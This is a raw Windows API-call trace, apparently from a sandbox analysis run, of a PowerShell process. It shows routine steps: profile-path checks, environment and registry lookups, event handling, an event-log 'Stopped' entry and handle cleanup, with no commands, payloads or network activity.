[0142.836] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x25e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0142.836] GetLastError () returned 0x3f0 [0142.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x25e26c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0142.837] GetLastError () returned 0x3f0 [0142.837] SetErrorMode (uMode=0x1) returned 0x1 [0142.837] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e6ec | out: lpFileInformation=0x25e6ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0142.837] GetLastError () returned 0x2 [0142.837] SetErrorMode (uMode=0x1) returned 0x1 [0142.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x25e26c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0142.837] GetLastError () returned 0x2 [0142.837] SetErrorMode (uMode=0x1) returned 0x1 [0142.837] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e6ec | out: lpFileInformation=0x25e6ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0142.837] GetLastError () returned 0x2 [0142.838] SetErrorMode (uMode=0x1) returned 0x1 [0142.838] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x25e26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0142.838] GetLastError () returned 0x2 [0142.838] SetErrorMode (uMode=0x1) returned 0x1 [0142.838] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e6ec | out: lpFileInformation=0x25e6ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0142.839] GetLastError () returned 0x3 [0142.839] SetErrorMode (uMode=0x1) returned 0x1 [0142.839] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x25e26c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0142.839] GetLastError () returned 0x3 [0142.839] SetErrorMode (uMode=0x1) returned 0x1 [0142.839] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e6ec | out: lpFileInformation=0x25e6ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0142.839] GetLastError () returned 0x3 [0142.839] SetErrorMode (uMode=0x1) returned 0x1 [0142.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.840] GetLastError () returned 0xcb [0142.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.842] GetLastError () returned 0xcb [0142.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.845] GetLastError () returned 0xcb [0142.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.846] GetLastError () returned 0xcb [0142.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.846] GetLastError () returned 0xcb [0142.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.852] GetLastError () returned 0xcb [0142.852] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8 [0142.852] GetLastError () returned 0x0 [0142.852] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ac [0142.852] GetLastError () returned 0x0 [0142.852] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0 [0142.852] GetLastError () returned 0x0 [0142.853] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4 [0142.853] GetLastError () returned 0x0 [0142.853] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b8 [0142.853] GetLastError () returned 0x0 [0142.853] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3bc [0142.853] GetLastError () returned 0x0 [0142.853] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3dc [0142.853] GetLastError () returned 0x0 [0142.853] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0 [0142.853] GetLastError () returned 0x0 [0142.853] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4 [0142.853] GetLastError () returned 0x0 [0142.853] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c8 [0142.853] GetLastError () returned 0x0 [0142.853] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328 [0142.853] GetLastError () returned 0x0 [0142.853] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c [0142.853] GetLastError () returned 0x0 [0142.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.855] GetLastError () returned 0xcb [0142.860] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0142.860] GetLastError () returned 0xcb [0142.861] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0x25e72c | out: lpMode=0x25e72c) returned 0 [0142.861] GetLastError () returned 0x6 [0142.862] SetEvent (hEvent=0x3b4) returned 1 [0142.862] GetLastError () returned 0x6 [0142.862] SetEvent (hEvent=0x3a8) returned 1 [0142.862] GetLastError () returned 0x6 [0142.862] SetEvent (hEvent=0x3ac) returned 1 [0142.862] GetLastError () returned 0x6 [0142.862] SetEvent (hEvent=0x3b0) returned 1 [0142.862] GetLastError () returned 0x6 [0142.862] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc [0142.862] GetLastError () returned 0x0 [0142.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.863] GetLastError () returned 0xcb [0142.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e590 | out: phkResult=0x25e590*=0x34c) returned 0x0 [0142.863] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x25e5d8, lpData=0x0, lpcbData=0x25e5d4*=0x0 | out: lpType=0x25e5d8*=0x0, lpData=0x0, lpcbData=0x25e5d4*=0x0) returned 0x2 [0144.387] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388 [0144.387] GetLastError () returned 0x0 [0144.387] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x38c [0144.387] GetLastError () returned 0x0 [0144.387] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390 [0144.387] GetLastError () returned 0x0 [0144.387] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394 [0144.387] GetLastError () returned 0x0 [0144.387] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398 [0144.387] GetLastError () returned 0x0 [0144.388] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x39c [0144.388] GetLastError () returned 0x0 [0144.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d4 [0144.388] GetLastError () returned 0x0 [0144.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c0 [0144.388] GetLastError () returned 0x0 [0144.388] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e4 [0144.388] GetLastError () returned 0x0 [0144.388] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3e8 [0144.388] GetLastError () returned 0x0 [0144.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ec [0144.388] GetLastError () returned 0x0 [0144.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0 [0144.388] GetLastError () returned 0x0 [0144.388] SetEvent (hEvent=0x394) returned 1 [0144.388] GetLastError () returned 0x0 [0144.388] SetEvent (hEvent=0x388) returned 1 [0144.388] GetLastError () returned 0x0 [0144.388] SetEvent (hEvent=0x38c) returned 1 [0144.388] GetLastError () returned 0x0 [0144.388] SetEvent (hEvent=0x390) returned 1 [0144.388] GetLastError () returned 0x0 [0144.388] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0144.388] GetLastError () returned 0x0 [0144.389] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e5c4 | out: phkResult=0x25e5c4*=0x3f8) returned 0x0 [0144.389] RegQueryValueExW (in: hKey=0x3f8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x25e60c, lpData=0x0, lpcbData=0x25e608*=0x0 | out: lpType=0x25e60c*=0x0, lpData=0x0, lpcbData=0x25e608*=0x0) returned 0x2 [0144.433] SetEvent (hEvent=0x398) returned 1 [0144.433] GetLastError () returned 0x0 [0144.433] SetEvent (hEvent=0x39c) returned 1 [0144.433] GetLastError () returned 0x0 [0144.433] SetEvent (hEvent=0x3d4) returned 1 [0144.433] GetLastError () returned 0x0 [0144.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0144.462] GetLastError () returned 0xcb [0144.468] SetEvent (hEvent=0x344) returned 1 [0144.468] GetLastError () returned 0xcb [0144.470] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x315040, nSize=0x25e6a0 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e6a0) returned 0x1 [0144.471] GetLastError () returned 0xcb [0144.471] GetUserNameW (in: lpBuffer=0x2e48d0, pcbBuffer=0x25e6a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e6a8) returned 1 [0144.473] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cd3738*="Stopped", lpRawData=0x2cd35f4) returned 1 [0144.474] GetLastError () returned 0x0 [0144.475] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0144.476] GetLastError () returned 0x0 [0144.477] CoGetContextToken (in: pToken=0x25f3d8 | out: pToken=0x25f3d8) returned 0x0 [0144.477] CObjectContext::QueryInterface () returned 0x0 [0144.478] CObjectContext::GetCurrentThreadType () returned 0x0 [0144.478] Release () returned 0x0 [0144.479] CoGetContextToken (in: pToken=0x25f1b0 | out: pToken=0x25f1b0) returned 0x0 [0144.479] CObjectContext::QueryInterface () returned 0x0 [0144.479] CObjectContext::GetCurrentThreadType () returned 0x0 [0144.479] Release () returned 0x0 [0144.482] CoGetContextToken (in: pToken=0x25f1b0 | out: pToken=0x25f1b0) returned 0x0 [0144.482] CObjectContext::QueryInterface () returned 0x0 [0144.482] CObjectContext::GetCurrentThreadType () returned 0x0 [0144.482] Release () returned 0x0 [0144.524] CoGetContextToken (in: pToken=0x25f1b0 | out: pToken=0x25f1b0) returned 0x0 [0144.524] CObjectContext::QueryInterface () returned 0x0 [0144.525] CObjectContext::GetCurrentThreadType () returned 0x0 [0144.525] Release () returned 0x0 [0144.600] CoGetContextToken (in: pToken=0x25f190 | out: pToken=0x25f190) returned 0x0 [0144.600] CObjectContext::QueryInterface () returned 0x0 [0144.600] CObjectContext::GetCurrentThreadType () returned 0x0 [0144.600] Release () returned 0x0 [0144.602] CoUninitialize () Thread: id = 237 os_tid = 0x34c Thread: id = 238 os_tid = 0x5e8 Thread: id = 239 os_tid = 0x314 Thread: id = 240 os_tid = 0x324 Thread: id = 241 os_tid = 0x310 [0135.896] CoGetContextToken (in: pToken=0x4abf718 | out: pToken=0x4abf718) returned 0x0 [0135.896] CObjectContext::QueryInterface () returned 0x0 [0135.896] CObjectContext::GetCurrentThreadType () returned 0x0 [0135.896] Release () returned 0x0 [0135.896] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0140.441] LocalFree (hMem=0x2fee18) returned 0x0 [0140.441] GetLastError () returned 0x0 [0140.441] CloseHandle (hObject=0x34c) returned 1 [0140.441] GetLastError () returned 0x0 [0140.441] CloseHandle (hObject=0x13) returned 1 [0140.444] GetLastError () returned 0x0 [0140.444] CloseHandle (hObject=0xf) returned 1 [0140.445] GetLastError () returned 0x0 [0140.445] RegCloseKey (hKey=0x330) returned 0x0 [0140.445] RegCloseKey (hKey=0x32c) returned 0x0 [0140.445] RegCloseKey (hKey=0x328) returned 0x0 [0140.445] LocalFree (hMem=0x2fee38) returned 0x0 [0140.445] GetLastError () returned 0x0 [0140.445] RegCloseKey (hKey=0x35c) returned 0x0 [0142.017] RegCloseKey (hKey=0x3d4) returned 0x0 [0142.017] RegCloseKey (hKey=0x39c) returned 0x0 [0142.017] RegCloseKey (hKey=0x398) returned 0x0 [0142.017] RegCloseKey (hKey=0x394) returned 0x0 [0142.017] RegCloseKey (hKey=0x390) returned 0x0 [0142.018] RegCloseKey (hKey=0x38c) returned 0x0 [0142.018] RegCloseKey (hKey=0x388) returned 0x0 [0142.018] RegCloseKey (hKey=0x384) returned 0x0 [0142.018] RegCloseKey (hKey=0x380) returned 0x0 [0142.018] RegCloseKey (hKey=0x3d0) returned 0x0 [0142.019] RegCloseKey (hKey=0x378) returned 0x0 [0142.019] RegCloseKey (hKey=0x374) returned 0x0 [0142.019] RegCloseKey (hKey=0x370) returned 0x0 [0142.019] RegCloseKey (hKey=0x36c) returned 0x0 [0142.019] RegCloseKey (hKey=0x368) returned 0x0 [0142.020] RegCloseKey (hKey=0x364) returned 0x0 [0142.020] RegCloseKey (hKey=0x360) returned 0x0 [0142.020] RegCloseKey (hKey=0x34c) returned 0x0 [0142.020] RegCloseKey (hKey=0x3cc) returned 0x0 [0142.020] RegCloseKey (hKey=0x32c) returned 0x0 [0142.020] RegCloseKey (hKey=0x328) returned 0x0 [0142.021] RegCloseKey (hKey=0x3c8) returned 0x0 [0142.021] RegCloseKey (hKey=0x3c4) returned 0x0 [0142.021] RegCloseKey (hKey=0x3a0) returned 0x0 [0142.021] RegCloseKey (hKey=0x3dc) returned 0x0 [0142.021] RegCloseKey (hKey=0x3bc) returned 0x0 [0142.021] RegCloseKey (hKey=0x3b8) returned 0x0 [0142.022] RegCloseKey (hKey=0x3b4) returned 0x0 [0142.022] RegCloseKey (hKey=0x3b0) returned 0x0 [0142.022] RegCloseKey (hKey=0x3ac) returned 0x0 [0142.022] RegCloseKey (hKey=0x3a8) returned 0x0 [0142.022] RegCloseKey (hKey=0x3a4) returned 0x0 [0142.023] RegCloseKey (hKey=0x330) returned 0x0 [0142.023] RegCloseKey (hKey=0x3d8) returned 0x0 [0142.023] RegCloseKey (hKey=0x35c) returned 0x0 [0143.269] RegCloseKey (hKey=0x34c) returned 0x0 [0144.481] GetLastError () returned 0x0 [0144.481] GetLastError () returned 0x0 [0144.481] LocalFree (hMem=0x2e56f8) returned 0x0 [0144.481] GetLastError () returned 0x0 [0144.482] GetLastError () returned 0x0 [0144.482] GetLastError () returned 0x0 [0144.482] LocalFree (hMem=0x2e5670) returned 0x0 [0144.482] GetLastError () returned 0x0 [0144.490] DeregisterEventSource (hEventLog=0x4eb0004) returned 1 [0144.492] GetLastError () returned 0x0 [0144.503] CloseHandle (hObject=0x5f) returned 1 [0144.504] GetLastError () returned 0x0 [0144.504] CloseHandle (hObject=0x5b) returned 1 [0144.504] GetLastError () returned 0x0 [0144.504] CloseHandle (hObject=0x57) returned 1 [0144.505] GetLastError () returned 0x0 [0144.505] CloseHandle (hObject=0x53) returned 1 [0144.505] GetLastError () returned 0x0 [0144.505] CloseHandle (hObject=0x4f) returned 1 [0144.506] GetLastError () returned 0x0 [0144.506] CloseHandle (hObject=0x4b) returned 1 [0144.506] GetLastError () returned 0x0 [0144.506] CloseHandle (hObject=0x47) returned 1 [0144.507] GetLastError () returned 0x0 [0144.507] CloseHandle (hObject=0x43) returned 1 [0144.507] GetLastError () returned 0x0 [0144.507] CloseHandle (hObject=0x3f) returned 1 [0144.507] GetLastError () returned 0x0 [0144.508] CloseHandle (hObject=0x3b) returned 1 [0144.508] GetLastError () returned 0x0 [0144.508] CloseHandle (hObject=0x37) returned 1 [0144.508] GetLastError () returned 0x0 [0144.508] CloseHandle (hObject=0x33) returned 1 [0144.509] GetLastError () returned 0x0 [0144.509] CloseHandle (hObject=0x2f) returned 1 [0144.509] GetLastError () returned 0x0 [0144.509] CloseHandle (hObject=0x2b) returned 1 [0144.510] GetLastError () returned 0x0 [0144.510] CloseHandle (hObject=0x27) returned 1 [0144.510] GetLastError () returned 0x0 [0144.510] CloseHandle (hObject=0x23) returned 1 [0144.511] GetLastError () returned 0x0 [0144.511] CloseHandle (hObject=0x384) returned 1 [0144.511] GetLastError () returned 0x0 [0144.511] UnmapViewOfFile (lpBaseAddress=0x5420000) returned 1 [0144.511] CloseHandle (hObject=0x3cc) returned 1 [0144.511] GetLastError () returned 0x0 [0144.512] CloseHandle (hObject=0x32c) returned 1 [0144.512] GetLastError () returned 0x0 [0144.512] CloseHandle (hObject=0x328) returned 1 [0144.512] GetLastError () returned 0x0 [0144.512] CloseHandle (hObject=0x3c8) returned 1 [0144.512] GetLastError () returned 0x0 [0144.512] CloseHandle (hObject=0x3c4) returned 1 [0144.512] GetLastError () returned 0x0 [0144.512] CloseHandle (hObject=0x3a0) returned 1 [0144.512] GetLastError () returned 0x0 [0144.513] CloseHandle (hObject=0x3dc) returned 1 [0144.513] GetLastError () returned 0x0 [0144.513] CloseHandle (hObject=0x3bc) returned 1 [0144.513] GetLastError () returned 0x0 [0144.513] CloseHandle (hObject=0x3b8) returned 1 [0144.513] GetLastError () returned 0x0 [0144.513] CloseHandle (hObject=0x3b4) returned 1 [0144.513] GetLastError () returned 0x0 [0144.513] CloseHandle (hObject=0x3b0) returned 1 [0144.513] GetLastError () returned 0x0 [0144.514] CloseHandle (hObject=0x3ac) returned 1 [0144.514] GetLastError () returned 0x0 [0144.514] CloseHandle (hObject=0x3a8) returned 1 [0144.514] GetLastError () returned 0x0 [0144.514] CloseHandle (hObject=0x1f) returned 1 [0144.514] GetLastError () returned 0x0 [0144.514] CloseHandle (hObject=0x1b) returned 1 [0144.515] GetLastError () returned 0x0 [0144.515] CloseHandle (hObject=0x17) returned 1 [0144.515] GetLastError () returned 0x0 [0144.515] CloseHandle (hObject=0x13) returned 1 [0144.516] GetLastError () returned 0x0 [0144.516] RegCloseKey (hKey=0x3f8) returned 0x0 [0144.516] CloseHandle (hObject=0x3f4) returned 1 [0144.516] GetLastError () returned 0x0 [0144.516] CloseHandle (hObject=0x3f0) returned 1 [0144.516] GetLastError () returned 0x0 [0144.516] CloseHandle (hObject=0x3ec) returned 1 [0144.516] GetLastError () returned 0x0 [0144.517] CloseHandle (hObject=0x3e8) returned 1 [0144.517] GetLastError () returned 0x0 [0144.517] CloseHandle (hObject=0x3e4) returned 1 [0144.517] GetLastError () returned 0x0 [0144.517] CloseHandle (hObject=0x3c0) returned 1 [0144.517] GetLastError () returned 0x0 [0144.517] CloseHandle (hObject=0x3d4) returned 1 [0144.517] GetLastError () returned 0x0 [0144.517] CloseHandle (hObject=0x39c) returned 1 [0144.517] GetLastError () returned 0x0 [0144.517] CloseHandle (hObject=0x398) returned 1 [0144.518] GetLastError () returned 0x0 [0144.518] CloseHandle (hObject=0x394) returned 1 [0144.518] GetLastError () returned 0x0 [0144.518] CloseHandle (hObject=0x390) returned 1 [0144.518] GetLastError () returned 0x0 [0144.518] CloseHandle (hObject=0x38c) returned 1 [0144.518] GetLastError () returned 0x0 [0144.518] CloseHandle (hObject=0x388) returned 1 [0144.518] GetLastError () returned 0x0 [0144.518] CloseHandle (hObject=0xf) returned 1 [0144.519] GetLastError () returned 0x0 [0144.519] CloseHandle (hObject=0x7f) returned 1 [0144.519] GetLastError () returned 0x0 [0144.519] CloseHandle (hObject=0x7b) returned 1 [0144.520] GetLastError () returned 0x0 [0144.520] CloseHandle (hObject=0x77) returned 1 [0144.520] GetLastError () returned 0x0 [0144.520] CloseHandle (hObject=0x73) returned 1 [0144.521] GetLastError () returned 0x0 [0144.521] CloseHandle (hObject=0x6f) returned 1 [0144.521] GetLastError () returned 0x0 [0144.521] CloseHandle (hObject=0x6b) returned 1 [0144.522] GetLastError () returned 0x0 [0144.522] CloseHandle (hObject=0x344) returned 1 [0144.522] GetLastError () returned 0x0 [0144.522] UnmapViewOfFile (lpBaseAddress=0x2800000) returned 1 [0144.522] CloseHandle (hObject=0x358) returned 1 [0144.523] GetLastError () returned 0x0 [0144.523] RegCloseKey (hKey=0x80000004) returned 0x0 [0144.523] CloseHandle (hObject=0x310) returned 1 [0144.523] GetLastError () returned 0x0 [0144.523] CloseHandle (hObject=0x67) returned 1 [0144.524] GetLastError () returned 0x0 [0144.524] CloseHandle (hObject=0x63) returned 1 [0144.524] GetLastError () returned 0x0 Thread: id = 242 os_tid = 0x5bc [0142.870] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0142.894] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.900] VirtualQuery (in: lpAddress=0x5eee310, lpBuffer=0x5eef310, dwLength=0x1c | out: lpBuffer=0x5eef310*(BaseAddress=0x5eee000, AllocationBase=0x5560000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.906] GetLastError () returned 0xcb [0142.909] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.909] GetLastError () returned 0xcb [0142.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.911] GetLastError () returned 0xcb [0142.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.930] GetLastError () returned 0xcb [0142.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.936] GetLastError () returned 0xcb [0142.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.937] GetLastError () returned 0xcb [0142.943] VirtualQuery (in: lpAddress=0x5eee42c, lpBuffer=0x5eef42c, dwLength=0x1c | out: lpBuffer=0x5eef42c*(BaseAddress=0x5eee000, AllocationBase=0x5560000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.944] GetLastError () returned 0xcb [0142.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.946] GetLastError () returned 0xcb [0142.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.946] GetLastError () returned 0xcb [0142.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.957] GetLastError () returned 0xcb [0142.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.974] GetLastError () returned 0xcb [0143.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.112] GetLastError () returned 0xcb [0143.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.113] GetLastError () returned 0xcb [0143.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.114] GetLastError () returned 0xcb [0143.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.116] GetLastError () returned 0xcb [0143.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.117] GetLastError () returned 0xcb [0143.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.118] GetLastError () returned 0xcb [0143.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.119] GetLastError () returned 0xcb [0143.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb310, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.142] GetLastError () returned 0xcb [0143.195] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.195] GetLastError () returned 0xcb 